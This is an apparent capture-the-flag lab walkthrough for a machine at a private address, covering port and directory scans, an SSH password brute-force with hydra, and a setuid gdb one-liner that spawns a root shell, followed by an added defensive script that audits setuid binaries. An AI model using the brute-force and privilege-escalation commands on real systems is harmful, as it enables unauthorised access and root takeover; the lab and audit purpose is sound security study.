Enumeration
Machine IP → 192.168.208.142
Network Scan
Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.208.142
OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|---|---|---|
| 22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.38 ((Debian)) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.208.142 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
This did not reveal any useful information.
Exploitation
Using the image on the webpage as a reference, the username could be gaara. Therefore, hydra was used to brute-force the SSH server against the rockyou password list.
hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.208.142:22
This gives the password as iloveyou2 and subsequently gets the user flag.
Privilege Escalation
Checking for setuid binaries reveals the presence of gdb as a setuid-root executable. The user is not present in the sudoers file. Therefore, it is essential to escalate using the gdb binary.
This is done as follows → gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
This grants the root shell and subsequently the root flag.
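The setuid gdb finding above is what an administrator would want to catch before an attacker does. The following audit script is an added example, not part of the original write-up: the function names, the RISKY_NAMES watch list and the sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: list setuid files under a directory and flag the ones whose
# name is on a watch list of programs that can spawn a shell or run code.
# RISKY_NAMES is an illustrative (constructed) list, not an exhaustive one.
RISKY_NAMES="gdb python python3 perl ruby bash sh dash vim find nmap env awk"

# audit_setuid DIR
# Prints one line per setuid regular file: "<RISKY|review> <owner> <mode> <path>"
audit_setuid() {
    root_dir=${1:-/}
    find "$root_dir" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        name=$(basename "$path")
        verdict=review
        for risky in $RISKY_NAMES; do
            case "$name" in
                # exact name, or a versioned copy such as python3.9
                "$risky" | "$risky"[0-9.]*) verdict=RISKY ;;
            esac
        done
        owner=$(stat -c '%U' "$path" 2>/dev/null) || owner=unknown
        mode=$(stat -c '%a' "$path" 2>/dev/null) || mode=unknown
        printf '%s %s %s %s\n' "$verdict" "$owner" "$mode" "$path"
    done
}

# build_sample_tree
# Creates a constructed test tree (empty placeholder files, not real binaries)
# and prints its path, so the audit can be tried without touching the system.
build_sample_tree() {
    tree=$(mktemp -d) || return 1
    mkdir -p "$tree/bin"
    : > "$tree/bin/gdb"      # setuid debugger: the case from this write-up
    : > "$tree/bin/passwd"   # setuid by design on most systems
    : > "$tree/bin/ls"       # ordinary file, must not be reported
    chmod 4755 "$tree/bin/gdb" "$tree/bin/passwd"
    chmod 0755 "$tree/bin/ls"
    printf '%s\n' "$tree"
}

# Remediation once a finding is confirmed: chmod u-s /path/to/binary
```

On a real host, run `audit_setuid /` as root and compare the output against a known-good baseline; any RISKY line deserves immediate review.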